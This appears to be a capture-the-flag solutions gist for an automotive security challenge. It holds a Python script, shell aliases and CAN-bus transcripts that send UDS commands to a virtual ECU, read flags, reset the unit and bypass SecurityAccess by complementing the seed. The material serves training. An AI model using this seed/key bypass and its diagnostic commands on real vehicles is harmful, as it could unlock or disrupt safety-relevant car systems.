@genhack
Last active May 9, 2025 15:00
VSec Challenge Alias and Solutions.
#!/usr/bin/env python3
import os
import queue
import re
import signal
import subprocess
import sys
import tempfile
import threading
import time
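def usage():
    """Print the command-line synopsis to stderr and exit with status 1.

    Called when the script is not started with exactly three arguments
    (CAN interface, TxID, RxID).
    """
    # Diagnostics go to stderr, like the script's "seed not received" error,
    # so they never mix with the dump that is echoed on stdout.
    print(f"Uso: {sys.argv[0]} <iface> <TxID es.7E0> <RxID es.7E8>", file=sys.stderr)
    sys.exit(1)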
# Exactly three positional arguments are required: interface, TxID, RxID.
if len(sys.argv[1:]) != 3:
    usage()
iface, txid, rxid = sys.argv[1:]

# 1) Start isotpdump in the background and capture its stdout.
# The capture log is a named temporary file created with delete=False, so it
# is still on disk after the script ends.
tmp = tempfile.NamedTemporaryFile(delete=False, mode='w+t')
# Arguments are passed as a list (no shell), so the CLI values are never
# interpreted by a shell.
dump_cmd = ["isotpdump", "-s", txid, "-d", rxid, "-a", "-u", iface]
proc = subprocess.Popen(
    dump_cmd,
    stdout=subprocess.PIPE,
    stderr=subprocess.DEVNULL,
    universal_newlines=True,
    bufsize=1,  # line-buffered
)
print(f"==> Avviato isotpdump (pid {proc.pid}), log in {tmp.name}")
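def cleanup():
    """Stop the background isotpdump process and close the capture log.

    Safe to call more than once: the script calls it explicitly after the
    seed wait and it is also registered with atexit.
    """
    try:
        proc.kill()
        # Reap the child so it does not linger as a zombie process.
        proc.wait(timeout=1.0)
    except (OSError, subprocess.TimeoutExpired):
        # Best effort only: the process may already be gone, or slow to die.
        pass
    tmp.close()
    # The log file is deliberately left on disk for debugging.


import atexit

# Make sure isotpdump is stopped even if the script exits early.
atexit.register(cleanup)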
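# 2) Enter diagnostic session 03 (DiagnosticSessionControl).
print("==> Inoltro DiagnosticSessionControl (10 03)")
subprocess.run(
    ["isotpsend", "-p", "00", "-s", txid, "-d", rxid, iface],
    input="10 03\n", universal_newlines=True,
    # Fail loudly if isotpsend could not send the frame instead of carrying
    # on and ending in a misleading "seed not received" timeout.
    check=True,
)
# NOTE(review): the positive response to 10 03 is not checked before the
# seed request is sent; the script only pauses briefly.
time.sleep(0.1)

# 3) Request the seed (SecurityAccess, sub-function 03).
print("==> Inoltro SecurityAccess Request Seed (27 03)")
subprocess.run(
    ["isotpsend", "-p", "00", "-s", txid, "-d", rxid, iface],
    input="27 03\n", universal_newlines=True,
    check=True,
)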
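# 4) Read dump lines until the seed response is seen or the timeout expires.
seed_line = None
# A monotonic clock keeps the 2-second window immune to wall-clock changes.
deadline = time.monotonic() + 2.0
# Matches the "67 03 XX YY" response and captures the two seed bytes.
pattern = re.compile(r'\b67 03 ([0-9A-Fa-f]{2}) ([0-9A-Fa-f]{2})\b')

# readline() on the pipe blocks until isotpdump prints something, so reading
# it directly would let a silent bus hold the script past the deadline.
# A daemon thread does the blocking reads and hands lines over a queue that
# can be polled with a timeout.
_dump_lines = queue.Queue()


def _pump_dump_output():
    """Forward each isotpdump output line to the queue; None marks EOF."""
    try:
        for dump_line in proc.stdout:
            _dump_lines.put(dump_line)
    except (OSError, ValueError):
        # The pipe was closed underneath us; treat it as end of output.
        pass
    _dump_lines.put(None)


threading.Thread(target=_pump_dump_output, daemon=True).start()

while True:
    remaining = deadline - time.monotonic()
    if remaining <= 0:
        break
    try:
        line = _dump_lines.get(timeout=remaining)
    except queue.Empty:
        break
    if line is None:
        # isotpdump closed its stdout.
        break
    # Keep a copy in the log file and echo the line to the terminal.
    tmp.write(line)
    tmp.flush()
    sys.stdout.write(line)
    m = pattern.search(line)
    if m:
        seed_hi, seed_lo = m.group(1), m.group(2)
        seed_line = (seed_hi, seed_lo)
        break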
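# 5) Stop isotpdump (this also closes, and therefore flushes, the log file).
cleanup()
print("\n---- isotpdump output completo (in {}) ----".format(tmp.name))
# Replay the log from Python rather than through `cat` in a shell: no path is
# interpolated into a shell command line, and the text goes through the same
# buffered sys.stdout as the surrounding print() calls, so it stays in order
# when stdout is redirected.
with open(tmp.name) as log_file:
    sys.stdout.write(log_file.read())
print("---- fine dump ----\n")
if not seed_line:
    # Without a seed there is nothing to compute; exit with status 2.
    print("Errore: seed non ricevuto (timeout o pattern non trovato)", file=sys.stderr)
    sys.exit(2)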
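# 6) Rebuild the 16-bit seed from its two hex bytes and derive the key.
seed = (int(seed_line[0], 16) << 8) | int(seed_line[1], 16)
print(f"Ricevuto seed: 0x{seed:04X}")
# The key is the 16-bit bitwise complement of the seed.
# NOTE(review): a key derived this way gives no real protection; it is only
# appropriate for a training/challenge target.
key = (~seed) & 0xFFFF
print(f"Calcolata key: 0x{key:04X}")

# 7) Send the key (SecurityAccess, sub-function 04), high byte first.
hi = (key >> 8) & 0xFF
lo = key & 0xFF
cmd = f"27 04 {hi:02X} {lo:02X}\n"
print(f"==> Inoltro SecurityAccess Send Key ({cmd.strip()})")
subprocess.run(
    ["isotpsend", "-p", "00", "-s", txid, "-d", rxid, iface],
    input=cmd, universal_newlines=True,
    # Do not report completion if isotpsend itself failed.
    check=True,
)
# NOTE(review): isotpdump has already been stopped at this point, so the
# ECU's answer to 27 04 is never read. The message below only means the
# frame was handed to isotpsend, not that access was granted.
print("==> Operazione completata.")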
Wiki:
https://ramn.readthedocs.io/en/latest/userguide/diag_tutorial.html#
Command:
isotpdump -s 7E0 -d 7E8 -c -a -u vcan0
Alias:
# Show raw CAN frames on vcan0 whose candump line contains 7E0 or 7E8.
alias ecuAD='candump vcan0 | grep "7E0\|7E8"'
# Same filter for 7E0 and 7DF.
alias ecuAF='candump vcan0 | grep "7E0\|7DF"'
# Run isotprecv on the 7E0/7E8 pair in an endless loop; each received line is
# printed as hex text and then decoded with xxd and shown as a hexdump.
alias iso-monitor='while true; do isotprecv -p 00 -s 7E0 -d 7E8 -l vcan0 | while read line; do echo "$line"; echo "$line" | xxd -r -p 2>/dev/null | hexdump -C; done; done'
# Same monitor for the 7E0/7DF pair.
alias iso-monitorF='while true; do isotprecv -p 00 -s 7E0 -d 7DF -l vcan0 | while read line; do echo "$line"; echo "$line" | xxd -r -p 2>/dev/null | hexdump -C; done; done'
Vin:
echo "22 F1 90" | isotpsend -p 00 -s 7E0 -d 7E8 vcan0
8fe34400a5d1:~$ ecuAD │8fe34400a5d1:~$ iso-monitor
vcan0 7E0 [8] 03 22 F1 90 00 00 00 00 │62 F1 90 66 6C 61 67 7B 76 31 6E 5F 42 48 6D 61 63 68 33 7D
vcan0 7E8 [8] 10 14 62 F1 90 66 6C 61 │00000000 62 f1 90 66 6c 61 67 7b 76 31 6e 5f 42 48 6d 61 |b..flag{v1n_BHma|
vcan0 7E0 [8] 30 00 00 00 00 00 00 00 │00000010 63 68 33 7d |ch3}|
vcan0 7E8 [8] 21 67 7B 76 31 6E 5F 42 │00000014
vcan0 7E8 [8] 22 48 6D 61 63 68 33 7D
Restart ecu:
8fe34400a5d1:~$ echo "11 01" | isotpsend -p 00 -s 7E0 -d 7DF vcan0
8fe34400a5d1:~$ ecuAF
vcan0 7E0 [8] 03 22 F1 90 00 00 00 00 │8fe34400a5d1:~$ iso-monitorF
vcan0 7E0 [8] 02 11 01 00 00 00 00 00 │67 30 47 72 65 33 6E
vcan0 7DF [8] 07 67 30 47 72 65 33 6E │00000000 67 30 47 72 65 33 6e |g0Gre3n|
│00000007
Engine Trouble:
echo "19 02 FF" | isotpsend -p 00 -s 7E0 -d 7E8 vcan0
fe34400a5d1:~$ isotpdump -s 7e0 -d 7e8 -a -u vcan0 │8fe34400a5d1:~$ isotprecv -p 00 -s 7E0 -d 7E8 -l vcan0
vcan0 7E0 [8] [SF] ln: 3 data: 19 02 FF 00 00 00 00 - '.......' - [SRQ] ReadDTCIn │59 02 FF 3E 9F 01 AB
formation │
vcan0 7E8 [8] [SF] ln: 7 data: 59 02 FF 3E 9F 01 AB - 'Y..>...' - [PSR] ReadDTCIn │
formation
Secrets in Memory:
WIP: you need a loop there...
Security Access Level 3:
1. Request Diag Session # Tic Tac Tic Tac... the anti-bruteforce starts here...
echo "10 03" | isotpsend -p 00 -s 7E0 -d 7E8 vcan0
vcan0 7E0 [8] [SF] ln: 2 data: 10 03 00 00 00 00 00 - '.......' - [SRQ] DiagnosticSessionControl
vcan0 7E8 [8] [SF] ln: 2 data: 50 03 00 00 00 00 00 - 'P......' - [PSR] DiagnosticSessionControl
2.Request Seed Level3
echo "27 03" | isotpsend -p 00 -s 7E0 -d 7E8 vcan0
vcan0 7E0 [8] [SF] ln: 2 data: 27 03 00 00 00 00 00 - ''......' - [SRQ] SecurityAccess
vcan0 7E8 [8] [SF] ln: 4 data: 67 03 9D C2 00 00 00 - 'g......' - [PSR] SecurityAccess
#0x9DC2
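3. XOR the seed with 0xFFFF (equivalently, subtract it from 0xFFFF). The key is just the seed's bitwise complement, so this SecurityAccess level offers no real protection.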
SEED=0X9DC2
printf "%04X\n" $(( (~SEED)&0xFFFF ))
0xFFFF - 0x9DC2 = 0x623D
4. Send the key
echo "27 04 62 3D" | isotpsend -p 00 -s 7E0 -d 7E8 vcan0
vcan0 7E0 [8] [SF] ln: 4 data: 27 04 62 3D 00 00 00 - ''.b=...' - [SRQ] SecurityAccess
vcan0 7E8 [8] [SF] ln: 2 data: 67 04 00 00 00 00 00 - 'g......' - [PSR] SecurityAccess
# Access granted: 67 04 is the positive response to sub-function 04; the 00 bytes are frame padding